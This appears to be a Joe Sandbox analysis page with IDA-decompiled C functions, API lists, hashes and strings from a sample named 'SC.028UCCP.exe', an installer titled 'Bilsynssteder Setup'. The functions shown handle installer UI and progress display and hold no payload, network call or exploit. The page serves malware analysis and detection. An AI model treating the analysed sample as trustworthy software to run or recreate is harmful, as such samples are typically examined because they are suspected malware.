Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: aa0e477bcc705a69a8995f502b88efa21aa2dc7506c02b0781f8c30215ed14f3
Instruction ID: 0916882698d777068a17293f0a109363b50d7816b2f78cc6e62ac313510dd3fa
Opcode Fuzzy Hash: aa0e477bcc705a69a8995f502b88efa21aa2dc7506c02b0781f8c30215ed14f3
Instruction Fuzzy Hash: E5319F71C00128BBDF216FA5CD89DAE7E79EF05364F20423AF920762E1C7795D408BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404EA5 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404EA5(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e384; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ec54; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BBA(0, _t39, 0x429800, 0x429800, _a4);
					}
					_t26 = lstrlenA(0x429800);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e368, 0x429800);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429800;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429800)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429800, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404eab
0x00404eb7
0x00404eba
0x00404ec0
0x00404ecc
0x00404ecf
0x00404ed2
0x00404ed8
0x00404ed8
0x00404ede
0x00404ee6
0x00404ee9
0x00404f06
0x00404f0a
0x00404f13
0x00404f13
0x00404f1d
0x00404f26
0x00404f32
0x00404f39
0x00404f3d
0x00404f40
0x00404f53
0x00404f61
0x00404f61
0x00404f65
0x00404f67
0x00404f6a
0x00000000
0x00404f6a
0x00404eeb
0x00404ef3
0x00404efb
0x00404f01
0x00000000
0x00404f01
0x00404efb
0x00404ee9
0x00404f74

APIs

lstrlenA.KERNEL32(00429800,00000000,0041B7D0,75DD23A0,?,?,?,?,?,?,?,?,?,00402FC7,00000000,?), ref: 00404EDE
lstrlenA.KERNEL32(00402FC7,00429800,00000000,0041B7D0,75DD23A0,?,?,?,?,?,?,?,?,?,00402FC7,00000000), ref: 00404EEE
lstrcatA.KERNEL32(00429800,00402FC7,00402FC7,00429800,00000000,0041B7D0,75DD23A0), ref: 00404F01
SetWindowTextA.USER32(00429800,00429800), ref: 00404F13
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F39
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F53
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F61

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: c9083a636ea0aba9f6a344c430bd940ed2e4200957790827e4701f34104d4c6e
Instruction ID: 2f329427c1d46a6eb49e6b4738c3ca031e5b71a6493834ff03b3c934a5869de4
Opcode Fuzzy Hash: c9083a636ea0aba9f6a344c430bd940ed2e4200957790827e4701f34104d4c6e
Instruction Fuzzy Hash: 1F215CB1900118BADF119FA5DC80E9EBFB9FF45354F14807AF904B62A1C7789E41CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404770 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404770(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x0040477e
0x0040478b
0x00404791
0x004047cf
0x004047cf
0x004047de
0x004047e5
0x00000000
0x004047e7
0x00404793
0x004047a2
0x004047aa
0x004047ad
0x004047bf
0x004047c5
0x004047cc
0x00000000
0x004047cc
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040478B
GetMessagePos.USER32 ref: 00404793
ScreenToClient.USER32(?,?), ref: 004047AD
SendMessageA.USER32(?,00001111,00000000,?), ref: 004047BF
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047E5

Strings

f, xrefs: 004047C1

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction ID: 692a8fbc4ab4c19ca7eb206a77325c926543f9b55c82df0cde7f20f300a3092d
Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction Fuzzy Hash: 49015275D00219BADB01DBA5DC45FFEBBBCAF55B11F10412BBA10B72C0C7B465018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B4C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B4C(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414bc8; // 0x3fc1c
					_t11 =  *0x428bd8; // 0x41480
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b59
0x00402b67
0x00402b6d
0x00402b6d
0x00402b7b
0x00402b7d
0x00402b83
0x00402b8a
0x00402b8c
0x00402b8c
0x00402ba2
0x00402bb2
0x00402bc4
0x00402bc4
0x00402bcc

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B67
MulDiv.KERNEL32(0003FC1C,00000064,00041480), ref: 00402B92
wsprintfA.USER32 ref: 00402BA2
SetWindowTextA.USER32(?,?), ref: 00402BB2
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BC4

Strings

verifying installer: %d%%, xrefs: 00402B9C

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: c26ab94ce710109fae0aeb594136b964e4d404ed4db4c01ad1bdf6ee359589c4
Instruction ID: 7934417d2aa742b95e7c6aae042493f9aa22ef4d350393a5f66c8f789a822ef4
Opcode Fuzzy Hash: c26ab94ce710109fae0aeb594136b964e4d404ed4db4c01ad1bdf6ee359589c4
Instruction Fuzzy Hash: 81014F70640208BBEF249F60DC49EAE3B79EB00305F008039FA06E92D0D7B8A9518F59

Uniqueness

Uniqueness Score: -1.00%

Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00401D26() {
				void* __esi;
				int _t7;
				signed char _t13;
				struct HFONT__* _t16;
				void* _t20;
				struct HDC__* _t26;
				void* _t28;
				void* _t30;

				_t26 = GetDC( *(_t30 - 0x34));
				_t7 = GetDeviceCaps(_t26, 0x5a);
				0x40afc8->lfHeight =  ~(MulDiv(E004029EA(2), _t7, 0x48));
				ReleaseDC( *(_t30 - 0x34), _t26);
				 *0x40afd8 = E004029EA(3);
				_t13 =  *((intOrPtr*)(_t30 - 0x14));
				 *0x40afdf = 1;
				 *0x40afdc = _t13 & 0x00000001;
				 *0x40afdd = _t13 & 0x00000002;
				 *0x40afde = _t13 & 0x00000004;
				E00405BBA(_t20, _t26, _t28, "Times New Roman",  *((intOrPtr*)(_t30 - 0x20)));
				_t16 = CreateFontIndirectA(0x40afc8);
				_push(_t16);
				_push(_t28);
				E00405AF6();
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401d2f
0x00401d36
0x00401d51
0x00401d56
0x00401d63
0x00401d68
0x00401d73
0x00401d7a
0x00401d8c
0x00401d92
0x00401d97
0x00401da1
0x004024c9
0x00401561
0x00402844
0x0040289f
0x004028ab

APIs

GetDC.USER32(?), ref: 00401D29
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
ReleaseDC.USER32(?,00000000), ref: 00401D56
CreateFontIndirectA.GDI32(0040AFC8), ref: 00401DA1

Strings

Times New Roman, xrefs: 00401D87

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: aa9dc3adce9858671d5dba2cadb35a05a48f9df2347b8c60a3318e7a06823940
Instruction ID: c142ac7f18e80a92cd8e2978e7193c4b91d53847f6be053cad09bf3429225ebb
Opcode Fuzzy Hash: aa9dc3adce9858671d5dba2cadb35a05a48f9df2347b8c60a3318e7a06823940
Instruction Fuzzy Hash: 5A01FEB1945341BFEB0157B09F0AB9E3F75A715301F100435F102BA1E2C5791411DB2F

Uniqueness

Uniqueness Score: -1.00%

Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CCC(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A07(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401cd6
0x00401cdd
0x00401d0c
0x00401d14
0x00401d1b
0x00401d1b
0x0040289f
0x004028ab

APIs

GetDlgItem.USER32(?), ref: 00401CD0
GetClientRect.USER32(00000000,?), ref: 00401CDD
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
DeleteObject.GDI32(00000000), ref: 00401D1B

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: d56188219697d5a9022e48a5b127ed1ab16f4984756dd3b6fdcb6bca33d64de9
Instruction ID: f7f1d63128c079cdfc256ea0cddfbe125cd0bfb1103d38193b94d487dccf8fd6
Opcode Fuzzy Hash: d56188219697d5a9022e48a5b127ed1ab16f4984756dd3b6fdcb6bca33d64de9
Instruction Fuzzy Hash: 89F0FFB2A05114AFE701EBA4EE89DAFB7BCEB44301B104576F501F2191C674AD018B79

Uniqueness

Uniqueness Score: -1.00%

Function 0040468E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040468E(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405BBA(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405BBA(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405BBA(_t34, 0, 0x42a020, 0x42a020, _a8);
				wsprintfA(_t26 + lstrlenA(0x42a020), "%u.%u%s%s");
				return SetDlgItemTextA( *0x42e378, _a4, 0x42a020);
			}

0x00404696
0x0040469a
0x004046a2
0x004046a5
0x004046a6
0x004046a8
0x004046aa
0x004046ad
0x004046ad
0x004046b4
0x004046ba
0x004046ba
0x004046c1
0x004046cc
0x004046cd
0x004046d0
0x004046d0
0x004046dd
0x004046e8
0x004046eb
0x004046fd
0x00404704
0x00404705
0x00404714
0x00404724
0x00404740

APIs

lstrlenA.KERNEL32(0042A020,0042A020,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045AE,000000DF,0000040F,00000400,00000000), ref: 0040471C
wsprintfA.USER32 ref: 00404724
SetDlgItemTextA.USER32(?,0042A020), ref: 00404737

Strings

%u.%u%s%s, xrefs: 00404706

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: c8ea056dfa3a144537beba2f3c6443934102d1c9b75279f744f3cebc6392e070
Instruction ID: 203f11412081ff20a0a771540c2b0fd723cd680d979dc2a143f6ad93c85b8d83
Opcode Fuzzy Hash: c8ea056dfa3a144537beba2f3c6443934102d1c9b75279f744f3cebc6392e070
Instruction Fuzzy Hash: C0113B33A0013437DB0065699C05EAF325ADBC2335F140237FA25F61D1E9799C1185E9

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BB8() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029EA(3);
				 *(_t55 + 8) = E004029EA(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E00402A07(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A07(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A07();
					_t28 = E00402A07();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029EA();
					_t37 = E004029EA();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405AF6();
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bc1
0x00401bcd
0x00401bd0
0x00401bd9
0x00401bd9
0x00401bdc
0x00401be0
0x00401be9
0x00401be9
0x00401bec
0x00401bf0
0x00401bf2
0x00401c3f
0x00401c41
0x00401c4a
0x00401c52
0x00401c55
0x00401c55
0x00401c5e
0x00000000
0x00401bf4
0x00401bfb
0x00401bfd
0x00401c05
0x00401c08
0x00401c30
0x00401c64
0x00401c64
0x00401c0a
0x00401c18
0x00401c20
0x00401c23
0x00401c23
0x00401c08
0x00401c67
0x00401c6a
0x00401c70
0x00402844
0x00402844
0x0040289f
0x004028ab

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30

Strings

!, xrefs: 00401BEC

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 3b608c58aeb320f54738e69ae64955449a08ff71577337817719eb1ffb212fcd
Instruction ID: f21ca504329920278120de39c351f2906d9b7b9b661f4dd592fc9a47aef1d7f1
Opcode Fuzzy Hash: 3b608c58aeb320f54738e69ae64955449a08ff71577337817719eb1ffb212fcd
Instruction Fuzzy Hash: B5219071A44248AFEF01AFB4CD8AAAE7FB5EF44348F14043EF501B61E1D6B99940DB18

Uniqueness

Uniqueness Score: -1.00%

Function 00403908 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403908(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B0F(__ecx, "1033");
				while(1) {
					_t26 =  *0x42ebe4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42ebb0; // 0x651b28
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42ebe0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e380 = _t18[1];
					 *0x42ec48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e37c = _t23;
						E00405AF6(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x42a000, E00405BBA(_t13, _t24, _t26, "Bilsynssteder Setup", 0xfffffffe));
						_t11 =  *0x42ebcc; // 0x1
						_t27 =  *0x42ebc8; // 0x651d54
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x651d6c
								_t11 = E00405BBA(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x0040390c
0x00403911
0x00403917
0x0040391c
0x0040391c
0x00403924
0x00000000
0x00000000
0x00403926
0x0040392c
0x00403934
0x00403936
0x0040393c
0x0040393c
0x0040393e
0x0040394a
0x00000000
0x00000000
0x0040394e
0x00000000
0x00000000
0x00000000
0x00403950
0x00403955
0x0040395e
0x00403964
0x00403969
0x0040397d
0x00403988
0x004039a0
0x004039a6
0x004039ab
0x004039b3
0x004039d4
0x004039d4
0x004039d4
0x004039b5
0x004039b7
0x004039b7
0x004039bb
0x004039be
0x004039c2
0x004039c2
0x004039c7
0x004039cd
0x004039cd
0x00000000
0x004039b7
0x0040396b
0x00403970
0x00403979
0x00403972
0x00403972
0x00403972
0x00403970

APIs

SetWindowTextA.USER32(00000000,Bilsynssteder Setup), ref: 004039A0

Strings

Bilsynssteder Setup, xrefs: 0040398F
"C:\Users\user\Desktop\SC.028UCCP.exe", xrefs: 00403909
1033, xrefs: 0040390C, 00403916, 00403987

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$1033$Bilsynssteder Setup
API String ID: 530164218-1543473918
Opcode ID: e691829e5d8f6da335696d0e2a33a8aa908241772f9c4842c13feab9fa2f0a75
Instruction ID: 61f94bd1e48dda17ae9277a932331f79ad4cfb9e5e678fa4023af28e916b2a63
Opcode Fuzzy Hash: e691829e5d8f6da335696d0e2a33a8aa908241772f9c4842c13feab9fa2f0a75
Instruction Fuzzy Hash: 5911F3B1B046009BC734DF56DC80A733B6DEB85716768417BEC02A73E0C779AD028A58

Uniqueness

Uniqueness Score: -1.00%

